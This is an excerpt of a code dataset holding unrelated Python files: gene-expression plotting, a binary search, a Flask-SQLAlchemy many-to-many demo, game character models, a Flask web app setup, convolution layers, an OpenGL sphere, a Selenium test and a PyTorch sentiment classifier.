%s\\n(r = %s)\" % (lib_1, lib_2, corr_coeff))\n plt.plot(self._lib_names_and_countings[lib_1],\n self._lib_names_and_countings[lib_2],\n \"k.\", alpha=0.2)\n plt.xlabel(\"Expression %s\" % lib_1)\n plt.ylabel(\"Expression %s\" % lib_2)\n self._pp.savefig()\n plt.close(fig)\n\n def _set_axis_max(self):\n self._axis_max = max(\n [max(counting)\n for counting in self._lib_names_and_countings.values()])\n\n def plot_annotation_class_quantification(self, orientation_list):\n all_classes_sorted = set()\n no_of_libs = len(self._lib_names)\n for directions in self._lib_names_and_class_quanti.values():\n for classes_and_counting in directions.values():\n for anno_class in classes_and_counting.keys():\n all_classes_sorted.add(anno_class)\n all_classes_sorted = sorted(list(all_classes_sorted))\n bottom = np.array([0] * no_of_libs)\n fig = plt.figure()\n ax = plt.subplot(111)\n font = {'family': 'sans-serif', 'weight': 'normal', 'size': 6}\n matplotlib.rc('font', **font)\n plt.title(\"Number of reads per RNA class\")\n color_map = plt.get_cmap('Set3')\n cNorm = colors.Normalize(vmin=0, vmax=len(\n all_classes_sorted)*len(orientation_list)-1)\n scalarMap = cm.ScalarMappable(norm=cNorm, cmap=color_map)\n color_index = 0\n for direction in self._lib_names_and_class_quanti[\n self._lib_names[0]].keys():\n for anno_class in all_classes_sorted:\n countings = [\n self._lib_names_and_class_quanti[lib][direction][\n anno_class] for lib in self._lib_names]\n color = scalarMap.to_rgba(color_index)\n plt.bar(range(no_of_libs), countings, align=\"center\",\n bottom=bottom, linewidth=0, color=color, width=0.5,\n label=anno_class+\" \"+direction)\n bottom = bottom + countings\n color_index += 1\n plt.xticks(np.array(range(no_of_libs)), self._lib_names, rotation=45,\n ha=\"right\")\n plt.tight_layout()\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['left'].set_visible(False)\n ax.xaxis.set_ticks_position(\"none\")\n plt.legend(loc=\"upper right\", frameon=False, ncol=4)\n fig.savefig(self._output_path + '/Read No per RNA Class.pdf')\n\n def _plot_bokeh_read_no_per_lib(\n self, gene_quanti_combined_raw, data_bokeh_overview):\n try:\n colors = ['Black', 'DarkSlateGray', 'MediumVioletRed', 'DarkCyan',\n 'Indigo', 'DarkBlue', '#a6cee3', '#1f78b4', '#b2df8a',\n '#33a02c', '#fb9a99', '#e31a1c', '#fdbf6f', '#ff7f00',\n '#cab2d6', '#6a3d9a', '#ffff99', '#b15928']\n except IndexError:\n sys.stderr.write(\"Apparently the number of features to be \"\n \"plotted exceeds 18. Exiting\\n\")\n sys.exit(2)\n 
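# one stacked Bar chart is built per overview data set; the palette above provides 18 colors, one per feature/orientation stack\n 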
plots = []\n for data_set in data_bokeh_overview:\n pl = Bar(data_set, values='Gene count', label='Library', agg='sum',\n stack='Features_Orientation', palette=colors, tools=[\n HoverTool(tooltips=[(\"No of reads\", \"@height\")]),\n BoxZoomTool(), ResetTool(), PanTool(),\n WheelZoomTool()])\n pl.legend.background_fill_alpha = 0.5\n plots.append(pl)\n self._plot_bokeh_correlation(gene_quanti_combined_raw, plots)\n\n def _plot_bokeh_correlation(self, gene_quanti_combined_raw, plots):\n for lib_1 in self._lib_names:\n for lib_2 in self._lib_names:\n if lib_1 != lib_2:\n corr_coeff = np.corrcoef(\n gene_quanti_combined_raw[lib_1],\n gene_quanti_combined_raw[lib_2])[0][1]\n line_max = max(max(gene_quanti_combined_raw[lib_1]),\n max(gene_quanti_combined_raw[lib_2]))\n pl = figure(title='%s vs %s (r=%s)' % (\n lib_1, lib_2, corr_coeff), tools=[HoverTool(tooltips=[\n (\"Protein_ID\", \"@Name\"),\n (\"Sequence type\", \"@gbkey\"),\n (\"Product\", \"@product\")]), PanTool(),\n BoxZoomTool(),\n WheelZoomTool(),\n ResetTool()])\n pl.scatter(gene_quanti_combined_raw[lib_1],\n gene_quanti_combined_raw[lib_2], color='Black',\n source=ColumnDataSource(\n gene_quanti_combined_raw))\n pl.xaxis.axis_label = 'Expression %s' % (lib_1)\n pl.yaxis.axis_label = 'Expression %s' % (lib_2)\n pl.title.text_font_style = 'italic'\n pl.line([0.1, line_max], [0.1, line_max], line_width=0.8,\n color='Green')\n plots.append(pl)\n column(*plots)\n plot = column(*plots)\n html = file_html(plot, CDN, 'Viz Gene Quanti')\n with open(\n self._output_path + '/Visualization Gene Quantification.html',\n 'w') as output_bokeh:\n output_bokeh.write(html)\n \n def _dictionary_attributes(self, row):\n dic = dict([key.split(\"=\")\n for key in row[\"Attributes\"].split(\";\")])\n return dic\n\n","sub_path":"reademptionlib/vizgenequanti.py","file_name":"vizgenequanti.py","file_ext":"py","file_size_in_byte":11857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"270402429","text":"def iterativeBS(_list, item):\n start = 0\n end = len(_list) - 1\n found = False\n\n while start <= end and not found:\n mid = int((start + end)/2)\n if _list[mid] == item:\n found = True\n else:\n if item < _list[mid]:\n end = mid - 1 # search the left half of the array\n else:\n start = mid + 1 # search the right half of the array\n return found\n","sub_path":"Algorithms/searching/iterativeBinarySearch.py","file_name":"iterativeBinarySearch.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"296221819","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nimport pymysql\npymysql.install_as_MySQLdb()\n\napp=Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI']='mysql://root:123456@localhost:3306/flask'\napp.config['SQLALCHEMY_COMMIT_ON_TEARDOWN']=True\n\ndb=SQLAlchemy(app)\n\nclass Users(db.Model):\n __tablename__='users'\n id=db.Column(db.Integer,primary_key=True)\n username=db.Column(db.String(80),nullable=False,unique=True)\n age=db.Column(db.Integer)\n email=db.Column(db.String(120),unique=True)\n isActive=db.Column(db.Boolean,default=True)\n # Add the many-to-many (Users-to-Goods) relationship attribute and backref\n # This involves the third (association) table: users_goods\n goods=db.relationship('Goods',secondary='users_goods',lazy='dynamic',backref=db.backref('users',lazy='dynamic'))\n # Add a relationship attribute and backref for UsersGoods: this creates the link between the Users class and the UsersGoods class\n userGoods=db.relationship('UsersGoods',backref='user',lazy='dynamic')\n\n
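# Illustrative sketch: because users_goods carries extra data (count), it is mapped both as a plain secondary table (Users.goods) and as a full association object (UsersGoods). A purchase with a quantity can be recorded through the association object, e.g.:\n# ug = UsersGoods(users_id=1, goods_id=2, count=5)\n# db.session.add(ug)\n\n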
class Goods(db.Model):\n __tablename__='goods'\n id=db.Column(db.Integer,primary_key=True)\n gname=db.Column(db.String(80))\n gprice=db.Column(db.Float)\n # Add a relationship attribute and backref for UsersGoods: this creates the link between the Goods class and the UsersGoods class\n goodUsers = db.relationship('UsersGoods', backref='good', lazy='dynamic')\n\n# Create the third (association) table users_goods to represent the many-to-many relationship\nclass UsersGoods(db.Model):\n __tablename__='users_goods'\n id=db.Column(db.Integer,primary_key=True)\n users_id=db.Column(db.Integer,db.ForeignKey('users.id'))\n goods_id=db.Column(db.Integer,db.ForeignKey('goods.id'))\n count=db.Column(db.Integer,default=1)\n\ndb.create_all()\n\n@app.route('/01-users-goods')\ndef users_goods_views():\n # Buy good #1 for user #1\n user=Users.query.filter_by(id=1).first()\n good=Goods.query.filter_by(id=1).first()\n # Append the good to the list of goods purchased by the user\n user.goods.append(good)\n # Write the updated user back to the database\n db.session.add(user)\n\n # Buy good #2 for user #1\n ug=UsersGoods()\n ug.users_id=1\n ug.goods_id=2\n ug.count=5\n db.session.add(ug)\n return 'ok'\n\n\n@app.route('/02-remove-goods')\ndef remove_goods():\n # Fetch the Users row with id=1\n user=Users.query.filter_by(id=1).first()\n # Fetch the Goods row with id=1\n good = Goods.query.filter_by(id=1).first()\n # Remove the good from the user's purchases\n user.goods.remove(good)\n db.session.add(user)\n return 'Remove ok'\n\n\n@app.route('/03-query-goods')\ndef query_goods():\n # Query the goods purchased by user #1\n user=Users.query.filter_by(id=1).first()\n goods=user.goods.all()\n print('User name: %s'%user.username)\n for g in goods:\n print('Good name: %s'%g.gname)\n # Query the purchased quantity of each good\n count=user.userGoods.filter_by(goods_id=g.id).first().count\n print('Quantity purchased: %d'%count)\n # Users who purchased good #2\n good=Goods.query.filter_by(id=2).first()\n users=good.users.all()\n print('Good name: %s'% good.gname)\n for u in users:\n print('User name: %s'% u.username)\n coun=good.goodUsers.filter_by(users_id=u.id).first().count\n print('Quantity purchased: %d'%coun)\n return 'ok'\n\nif __name__=='__main__':\n app.run(debug=True,host='0.0.0.0')","sub_path":"PycharmProjects/FlaskDemo07/run01.py","file_name":"run01.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"325981697","text":"from mongoengine import Document, StringField, ListField, ObjectIdField\nimport src.entities.entity as entity\n\nclass CharacterTemplate(\n entity.LogicEntity,\n entity.HasData,\n entity.HasRegion,\n entity.HasItems):\n\n def __init__(self, *args, **kwargs):\n super(Document, self).__init__(*args, **kwargs)\n\n meta: {\n 'collection': 'characterTemplate'\n }\n\nclass Character(\n entity.LogicEntity,\n entity.HasData,\n entity.HasRoom,\n entity.HasRegion,\n entity.HasTemplate,\n entity.HasItems):\n\n def __init__(self, *args, **kwargs):\n super(Document, self).__init__(*args, **kwargs)\n self._logic_modules = {}\n\n logged_in = False\n account_id = ObjectIdField(db_field='accountId')\n commands = ListField(StringField())\n\n meta: {\n 'collection': 'character'\n }\n\n def add_command(self, cmd_name: str):\n if cmd_name not in self.commands:\n self.commands.append(cmd_name)\n\n def has_command(self, cmd_name: str):\n return cmd_name in self.commands\n\n def find_command(self, cmd_name: str):\n for command in self.commands:\n if command == cmd_name:\n return command\n\n for command in self.commands:\n if command.startswith(cmd_name):\n return command\n return None\n\n def from_template(self, template: CharacterTemplate):\n if template:\n self.name = template.name\n self.description = template.description\n self.logic = template.logic\n self.data = template.data\n self.template_id = template.id\n self.item_ids = 
template.item_ids\n","sub_path":"src/entities/character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"428901575","text":"# -*- coding: utf8 -*-\nimport os\nimport os.path\nimport sys\nimport flask\nimport flask_assets\nfrom zeeguu_web.crosscutting_concerns import CrossDomainApp\nimport tempfile\n\nif sys.version_info[0] < 3:\n raise Exception(\"Must be using Python 3\")\n\n# *** Starting the App *** #\napp = CrossDomainApp(__name__)\n\nconfig_file = os.environ['ZEEGUU_WEB_CONFIG']\napp.config.from_pyfile(config_file, silent=False)\nconfiguration = app.config\n\nassert \"ZEEGUU_API\" in app.config\n\nprint(\" == Web running with API: \" + app.config['ZEEGUU_API'])\n# the umr blueprint needs to have the ZEEGUU_API in the os.environ['ZEEGUU_API']\nos.environ['ZEEGUU_API'] = app.config['ZEEGUU_API']\n\nfrom .account import account\nfrom .bookmarks import bookmarks_blueprint\nfrom .static_pages import static_pages\n\napp.instance_path = tempfile.gettempdir() + \"/zeeguu-web-instance-path\"\napp.register_blueprint(account)\napp.register_blueprint(bookmarks_blueprint)\napp.register_blueprint(static_pages)\n\nfrom zeeguu_exercises import ex_blueprint\n\napp.register_blueprint(ex_blueprint, url_prefix=\"/practice\")\n\nfrom umr import reader_blueprint\n\napp.register_blueprint(reader_blueprint, url_prefix=\"/read\")\n\nenv = flask_assets.Environment(app)\nenv.cache = app.instance_path\nenv.directory = os.path.join(app.instance_path, \"gen\")\nenv.url = \"/gen\"\nenv.append_path(os.path.join(\n os.path.dirname(os.path.abspath(__file__)), \"static\"\n), \"/static\")\n\n\n# create the instance folder and return the path\ndef instance_path(app):\n path = os.path.join(app.instance_path, \"gen\")\n try:\n os.makedirs(path)\n except Exception as e:\n print((\"exception\" + str(e)))\n if not os.path.isdir(path):\n raise\n return path\n\n\ninstance = flask.Blueprint(\"instance\", __name__, static_folder=instance_path(app))\napp.register_blueprint(instance)\n","sub_path":"zeeguu_web/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"500157317","text":"from __future__ import division, absolute_import\n\nfrom abc import abstractmethod\n\nimport numpy as np\n\nfrom odin import backend as K\nfrom odin.basic import PARAMETER, WEIGHT, BIAS\nfrom odin.utils.decorators import autoinit\nfrom odin.utils import as_tuple\nfrom odin.utils.shape_calculation import get_conv_output_shape\nfrom .base import NNOps, NNConfig\n\n\nclass Conv(NNOps):\n \"\"\" Convolutional Operator\n\n Performs a 2D or 3D convolution on its input and optionally adds a bias and\n applies an elementwise activation.\n\n Parameters\n ----------\n num_filters : int\n The number of learnable convolutional filters this layer has.\n\n filter_size : int or iterable of int\n tuple specifying the size of the filters.\n\n stride : int or iterable of int\n specifying the stride of the convolution operation.\n\n pad : int, iterable of int, 'full', 'same' or 'valid' (default: 'valid')\n By default, the convolution is only computed where the input and the\n filter fully overlap (a valid convolution). 
When ``stride=1``, this\n yields an output that is smaller than the input by ``filter_size - 1``.\n The `pad` argument allows you to implicitly pad the input with zeros,\n extending the output size.\n\n A single integer results in symmetric zero-padding of the given size on\n all borders, a tuple of two integers allows different symmetric padding\n per dimension.\n\n ``'full'`` pads with one less than the filter size on both sides. This\n is equivalent to computing the convolution wherever the input and the\n filter overlap by at least one position.\n\n ``'same'`` pads with half the filter size (rounded down) on both sides.\n When ``stride=1`` this results in an output size equal to the input\n size. Even filter size is not supported.\n\n ``'valid'`` is an alias for ``0`` (no padding / a valid convolution).\n\n Note that ``'full'`` and ``'same'`` can be faster than equivalent\n integer values due to optimizations by theano or tensorflow.\n\n untie_biases : bool (default: False)\n If ``False``, the layer will have a bias parameter for each channel,\n which is shared across all positions in this channel. As a result, the\n `b` attribute will be a vector (1D).\n\n If True, the layer will have separate bias parameters for each\n position in each channel. As a result, the `b` attribute will be a\n 3D tensor.\n\n W_init : Theano shared variable, expression, numpy array or callable\n Initial value, expression or initializer for the weights.\n These should be a 4D tensor with shape\n ``(num_filters, num_input_channels, filter_rows, filter_columns)``.\n See :func:`lasagne.utils.create_param` for more information.\n\n b_init : Theano shared variable, expression, numpy array, callable or ``None``\n Initial value, expression or initializer for the biases. If set to\n ``None``, the layer will have no biases. Otherwise, biases should be\n a 1D array with shape ``(num_filters,)`` if `untie_biases` is set to\n ``False``. If it is set to ``True``, its shape should be\n ``(num_filters, output_rows, output_columns)`` instead.\n See :func:`lasagne.utils.create_param` for more information.\n\n activation : callable or None\n The activation that is applied to the layer activations. If None\n is provided, the layer will be linear.\n\n dilation : int or iterable of int\n Specifying the dilation factor of the filters. 
A factor of\n :math:`x` corresponds to :math:`x - 1` zeros inserted between\n adjacent filter elements.\n\n **kwargs\n Any additional keyword arguments are passed to the `NNOps` superclass.\n\n Attributes\n ----------\n W : Theano shared variable or expression\n Variable or expression representing the filter weights.\n\n b : Theano shared variable or expression\n Variable or expression representing the biases.\n\n Note\n ----\n This Ops can be used for both 2D and 3D images (videos)\n \"\"\"\n\n @autoinit\n def __init__(self, num_filters, filter_size, strides=1, pad='valid',\n W_init=K.init.glorot_uniform,\n b_init=K.init.constant(0),\n untie_biases=False,\n activation=K.linear,\n dilation=1, **kwargs):\n super(Conv, self).__init__(**kwargs)\n self.activation = K.linear if activation is None else activation\n\n # ==================== abstract methods ==================== #\n def _transpose(self):\n # flip the input and hidden\n return TransposeConv(self)\n\n def _initialize(self, x):\n input_shape = K.get_shape(x)\n # ====== validate init arguments ====== #\n ndim = len(input_shape) - 2; self.ndim = ndim\n # padding\n if isinstance(self.pad, (tuple, list, int)):\n self.pad = as_tuple(self.pad, ndim, int)\n elif self.pad is None:\n self.pad = (0,) * ndim\n # strides\n if self.strides is None:\n self.strides = (0,) * ndim\n else:\n self.strides = as_tuple(self.strides, ndim, int)\n # dilation\n if self.dilation is None:\n self.dilation = (1,) * ndim\n else:\n self.dilation = as_tuple(self.dilation, ndim, int)\n # filter size\n self.filter_size = as_tuple(self.filter_size, ndim, int)\n # ====== create config ====== #\n config = NNConfig(input_shape=input_shape)\n # TF kernel shape: (kernel_dim1, kernel_dim2, ..., input_depth, out_depth)\n kernel_shape = self.filter_size + (input_shape[-1], self.num_filters)\n # weights\n config.create_params(self.W_init, shape=kernel_shape, name='W',\n nnops=self, roles=WEIGHT)\n if self.b_init is not None:\n if self.untie_biases:\n output_shape = get_conv_output_shape(input_shape, kernel_shape,\n border_mode=self.pad, subsample=self.strides,\n filter_dilation=self.dilation)\n biases_shape = output_shape[1:]\n else:\n biases_shape = (self.num_filters,)\n config.create_params(self.b_init, shape=biases_shape, name='b',\n nnops=self, roles=BIAS)\n return config\n\n def _apply(self, x):\n # store last input for deconvolution ops\n self._last_input = x\n conved = self.convolve(x)\n output_shape = K.get_shape(conved)\n if not hasattr(self, 'b'):\n conved = conved\n elif self.untie_biases:\n conved += K.expand_dims(self.b, 0)\n else:\n conved += K.dimshuffle(self.b, ('x',) * (self.ndim + 1) + (0,))\n activated = self.activation(conved)\n K.add_shape(activated, output_shape)\n # set shape for output\n return activated\n\n def convolve(self, x):\n if self.ndim == 2:\n conv_func = K.conv2d\n elif self.ndim == 3:\n conv_func = K.conv3d\n else:\n raise Exception('No support for %d-D input.' 
% self.ndim)\n conved = conv_func(x, kernel=self.W,\n strides=self.strides,\n border_mode=self.pad,\n filter_dilation=self.dilation)\n return conved\n\n\nclass TransposeConv(NNOps):\n\n def __init__(self, conv):\n if not isinstance(conv, Conv):\n raise ValueError('TransposeConv Ops only accepts Conv as argument.')\n super(TransposeConv, self).__init__(name=conv.name + '_transpose')\n self.conv = conv\n\n # ==================== abstract method ==================== #\n def _initialize(self, x):\n \"\"\"Return the NNConfig for the given configuration from args\n and kwargs.\n \"\"\"\n # check if original Ops is initialized\n if self.conv.configuration is None:\n raise Exception('Convolution ops \"%s\" has not been initialized.' % str(self.conv))\n output_shape = self.conv.input_shape\n config = NNConfig(output_shape=output_shape)\n # initialize parameters\n b_init = self.conv.b_init\n if b_init is not None:\n if self.conv.untie_biases:\n biases_shape = output_shape[1:]\n else:\n biases_shape = (output_shape[-1],)\n config.create_params(b_init, shape=biases_shape, name='b',\n nnops=self, roles=BIAS)\n return config\n\n def _apply(self, x):\n if K.ndim(x) != self.conv.ndim + 2:\n raise ValueError('Input has %d dimensions, but this Ops requires a %d-D '\n 'tensor.' % (K.ndim(x), self.conv.ndim + 2))\n # ====== prepare the deconvolution ====== #\n stride = self.conv.strides\n border_mode = self.conv.pad\n W = self.conv.W\n dilation = self.conv.dilation\n # if Dilated Convolution, must transpose the Weights\n if self.conv.ndim == 2:\n deconv_func = K.deconv2d\n elif self.conv.ndim == 3:\n deconv_func = K.deconv3d\n else:\n raise Exception('No support for %d-D input in TransposeConv' %\n self.conv.ndim)\n # Theano requires batch_dims to be Constant or None, but TensorFlow\n # requires batch_dims to be a native TensorVariable\n conved = deconv_func(x, kernel=W,\n output_shape=K.get_shape(self.conv._last_input,\n native=True if K.backend() == 'tensorflow' else False),\n strides=stride,\n border_mode=border_mode,\n filter_dilation=dilation)\n if hasattr(self, 'b'):\n if self.conv.untie_biases:\n conved += K.expand_dims(self.b, 0)\n else:\n conved += K.dimshuffle(self.b, ('x',) * (self.conv.ndim + 1) + (0,))\n activated = self.conv.activation(conved)\n K.add_shape(activated, self.conv.input_shape)\n return activated\n\n def _transpose(self):\n return self.conv\n","sub_path":"odin/nnet/conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":10246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"481338415","text":"from OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GL import *\nfrom math import *\n\nclass Sphere:\n\n\thalf_pi = pi/2\n\n\tdef __init__(self, x, y, z, radius,color = (0,0,0), density = 50, tx = None):\n\t\tself.position = (x, y, z)\n\t\tself.radius = radius\n\t\tself.color = color\n\t\tself.density = density\n\t\tself.tx = tx\n\n\tdef draw(self, rotation = (0,1,1,1), texture_index = None):\n\t\tif texture_index is not None:\n\t\t\tself._draw_texturized_sphere(rotation, texture_index)\t\n\t\telse:\n\t\t\tself._draw_filled_sphere(rotation)\t\t\n\n\n\tdef move(self, x, y, z):\n\t\tself.position = (self.position[0] + x, self.position[1] + y, self.position[2] + z)\n\n\n\tdef move_to (self, x, y, z):\n\t\tself.position = (x, y, z)\n\n\n\tdef _sphere(self, u, v):\n\t\ttheta = (u * pi / (self.density - 1)) - self.half_pi\n\t\tphi = (v * 2 * pi) / (self.density - 1)\n\n\t\tx = self.radius * cos(theta) * cos(phi)\n\t\ty = 
self.radius * sin(theta)\n\t\tz = self.radius * cos(theta) * sin(phi)\n\n\t\treturn x, y, z\n\n\n\tdef _draw_filled_sphere(self, rotation):\n\t\tglPushMatrix()\n\t\t\n\t\tglTranslatef(*self.position)\n\t\tglRotatef(*rotation)\n\n\t\tfor i in range(0, self.density):\n\t\t\tglBegin(GL_TRIANGLE_STRIP)\n\t\t\tfor j in range(0, self.density):\n\t\t\t\tself._setColor(i, j)\n\t\t\t\tglVertex3fv(self._sphere(i,j))\n\t\t\t\tglVertex3fv(self._sphere(i - 1,j))\n\t\t\tglEnd()\n\n\t\tglPopMatrix()\n\n\n\tdef _setColor(self, i, j): \n\t\tif i < self.density//2: \n\t\t\tr = (i) / (self.density /2 - 1)\n\t\t\tg = (i) / (self.density /2 - 1)\n\t\t\tb = (i) / (self.density /2 - 1)\n\t\telse:\n\t\t\tr = ((self.density - i) / (self.density /2 - 1)) - 0.08\n\t\t\tg = ((self.density - i) / (self.density /2 - 1)) - 0.08\n\t\t\tb = ((self.density - i) / (self.density /2 - 1)) - 0.08\n\t\t\n\t\tglColor3f(r + (self.color[0] / 255), g + (self.color[1] / 255), b + (self.color[2] / 255))\n\n\n\tdef _draw_texturized_sphere(self, rotation, index):\n\n\t\tglBindTexture(GL_TEXTURE_2D, self.tx.textures[index])\n\n\t\tglPushMatrix()\n\t\t\n\t\tglTranslatef(*self.position)\n\t\tglRotatef(*rotation)\n\n\t\tfor i in range(0, self.density):\n\t\t\tglBegin(GL_TRIANGLE_STRIP)\n\t\t\tfor j in range(0, self.density):\n\t\t\t\tglTexCoord2f((self.density - 1 - j)/(self.density - 1), (self.density - 1 - i)/(self.density - 1)); glVertex3fv(self._sphere(i,j))\n\t\t\t\tglTexCoord2f((self.density - 1 - j)/(self.density - 1), (self.density - 1 - i)/(self.density - 1)); glVertex3fv(self._sphere(i - 1,j))\n\t\t\tglEnd()\n\n\t\tglPopMatrix()\t\n\n\n\tdef get_orbit_position(self, sphere, distance, angle):\t\n\n\t\tx, y, z = sphere.position\n\n\t\tx2 = x + ((sphere.radius + distance) * cos(angle))\n\t\ty2 = y + ((sphere.radius + distance) * sin(angle))\n\t\tz2 = z \n\n\t\treturn x2, y2, z2\n\n\nangle = {}\nrotation_speed = {}\ntranslation_speed = {}\n\ndef set_angle(index, rotation = (0,0), translation = (0,0)):\n\t\tangle[index] = {\n\t\t\t'rotation': rotation[0],\n\t\t\t'translation': translation[0]\n\t\t}\n\t\trotation_speed[index] = rotation[1]\n\t\ttranslation_speed[index] = translation[1]\n\n\ndef rotate(name):\n\tglobal angle\n\tangle[name]['rotation'] += rotation_speed[name]\n\tangle[name]['translation'] += translation_speed[name]","sub_path":"OpenGL/Textura/Planeta/Sphere.py","file_name":"Sphere.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"212317725","text":"import os\nimport logging\n\nimport docker\nimport selenium\n\nimport testutils\n\n\ndef test_delete_project(driver: selenium.webdriver, *args, **kwargs):\n \"\"\"\n Test that deleting a project in Gigantum deletes its file path and Docker image.\n\n Args:\n driver\n \"\"\"\n r = testutils.prep_py3_minimal_base(driver)\n username, project_name = r.username, r.project_name\n\n logging.info(f\"Checking that project {project_name} file path exists\")\n project_path = os.path.join(os.environ['GIGANTUM_HOME'], 'servers', testutils.current_server_id(),\n username, username, 'labbooks', project_name)\n\n assert os.path.exists(project_path), \\\n f\"Project {project_name} should exist at file path {project_path}\"\n\n logging.info(f\"Checking that project {project_name} Docker image exists\")\n dc = docker.from_env()\n project_img = []\n for img in dc.images.list():\n for t in img.tags:\n if 'gmlb-' in t and project_name in t:\n logging.info(f\"Found project {project_name} Docker image 
tag {t}\")\n project_img.append(img)\n\n assert len(project_img) == 1, f\"Expected project {project_name} to have one Docker image tag\"\n\n logging.info(f\"Deleting project {project_name}\")\n delete_project_elts = testutils.DeleteProjectElements(driver)\n delete_project_elts.delete_local_project(project_name)\n\n logging.info(f\"Checking that project {project_name } file path and Docker image no longer exist\")\n\n assert not os.path.exists(project_path), f\"Deleted project {project_name} exists at {project_path}\"\n\n project_img = []\n for img in dc.images.list():\n for t in img.tags:\n if \"gmlb-\" in t and project_name in t:\n logging.error(f\"Deleted project {project_name} has Docker image tag {t}\")\n project_img.append(img)\n\n assert len(project_img) == 0, \\\n f\"Deleted project {project_name} has Docker image {project_img[0]}\"\n","sub_path":"testing-legacy/gigantum_tests/test_delete_project.py","file_name":"test_delete_project.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"188111152","text":"import sentiment_utils as sent\r\nfrom sentiment_utils import MovieReviews\r\nfrom torch.utils.data import DataLoader\r\nimport torch\r\nfrom torchtext.data import get_tokenizer\r\nimport time\r\nfrom torchtext.vocab import build_vocab_from_iterator\r\nfrom torch.utils.data.dataset import random_split\r\nimport datetime\r\nimport os\r\nimport time \r\nimport pandas as pd\r\n\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\nprint(f\"Using {device} device for Torch\")\r\n\r\n\r\nmovie_train = MovieReviews(\"./movie_reviews/\", train=True, transform=None)\r\n# movie_test = MovieReviews(\"./movie_reviews/\", train=False, transform=None)\r\n\r\nsentiment_map = {\r\n 0: \"negative\",\r\n 1: \"somewhat negative\",\r\n 2: \"neutral\",\r\n 3: \"somewhat positive\",\r\n 4: \"positive\"\r\n}\r\n\r\ndef yield_tokens(data_iter):\r\n for text, _ in data_iter:\r\n yield tokenizer(text)\r\n\r\ntokenizer = get_tokenizer('basic_english')\r\nprint(\"Building Tokenized Vocab\")\r\nvocab = build_vocab_from_iterator(yield_tokens(movie_train))\r\n\r\ntext_pipeline = lambda x: vocab.lookup_indices(tokenizer(x))\r\nlabel_pipeline = lambda x: int(x)\r\n\r\n\r\ndef collate_batch(batch):\r\n label_list, text_list, offsets = [], [], [0]\r\n for (_text, _label) in batch:\r\n label_list.append(label_pipeline(_label))\r\n processed_text = torch.tensor(text_pipeline(_text), dtype=torch.int64).to(device)\r\n text_list.append(processed_text)\r\n offsets.append(processed_text.size(0))\r\n label_list = torch.tensor(label_list, dtype=torch.int64).to(device)\r\n offsets = torch.tensor(offsets[:-1]).cumsum(dim=0).to(device)\r\n text_list = torch.cat(text_list).to(device)\r\n return label_list.to(device), text_list.to(device), offsets.to(device)\r\n\r\n\r\nnum_classes = len(sentiment_map.keys())\r\nvocab_size = len(vocab)\r\nembed_size = 64\r\nmodel = sent.TextClassificationModel(vocab_size, embed_size, num_classes).to(device)\r\n#model = sent.TextLSTM(vocab_size, embed_size, num_classes, 3).to(device)\r\n\r\n\r\ndef train(dataloader):\r\n model.train()\r\n total_acc, total_count = 0, 0\r\n log_interval = 500\r\n start_time = time.time()\r\n for idx, (label, text, offsets) in enumerate(dataloader):\r\n optimizer.zero_grad()\r\n predited_label = model(text, offsets)\r\n loss = criterion(predited_label, label)\r\n loss.backward()\r\n torch.nn.utils.clip_grad_norm_(model.parameters(), 0.1)\r\n 
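# clip_grad_norm_ above rescales the gradients in place so their global norm stays at or below 0.1, guarding against exploding gradients before the update\r\n 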
optimizer.step()\r\n total_acc += (predited_label.argmax(1) == label).sum().item()\r\n total_count += label.size(0)\r\n if idx % log_interval == 0 and idx > 0:\r\n elapsed = time.time() - start_time\r\n print('| epoch {:3d} | {:5d}/{:5d} batches '\r\n '| accuracy {:8.3f}'.format(epoch, idx, len(dataloader),\r\n total_acc/total_count))\r\n total_acc, total_count = 0, 0\r\n start_time = time.time()\r\n\r\ndef evaluate(dataloader):\r\n model.eval()\r\n total_acc, total_count = 0, 0\r\n\r\n with torch.no_grad():\r\n for idx, (label, text, offsets) in enumerate(dataloader):\r\n predited_label = model(text, offsets)\r\n loss = criterion(predited_label, label)\r\n total_acc += (predited_label.argmax(1) == label).sum().item()\r\n total_count += label.size(0)\r\n return total_acc/total_count\r\n\r\n\r\n# Hyperparameters\r\nEPOCHS = 25 # epoch\r\nLR = 1.0 # learning rate\r\nBATCH_SIZE = 64 # batch size for training\r\n\r\nnum_train = int(len(movie_train) * 0.95)\r\nsplit_train_, split_valid_ = \\\r\n random_split(movie_train, [num_train, len(movie_train) - num_train])\r\n\r\ntrain_dataloader = DataLoader(split_train_, batch_size=BATCH_SIZE,\r\n shuffle=True, collate_fn=collate_batch)\r\nvalid_dataloader = DataLoader(split_valid_, batch_size=BATCH_SIZE,\r\n shuffle=True, collate_fn=collate_batch)\r\n\r\n\r\ntrain_dataloader = sent.DeviceDataLoader(train_dataloader, device=device)\r\nvalid_dataloader = sent.DeviceDataLoader(valid_dataloader, device=device)\r\n\r\n\r\ncriterion = torch.nn.CrossEntropyLoss().to(device)\r\noptimizer = torch.optim.SGD(model.parameters(), lr=LR)\r\nscheduler = torch.optim.lr_scheduler.StepLR(optimizer, 1.0, gamma=0.1)\r\ntotal_accu = None\r\n\r\n\r\nprint(\"Begin Training\\n\", \"*\"*75)\r\ntotal_start_time = time.time()\r\nfor 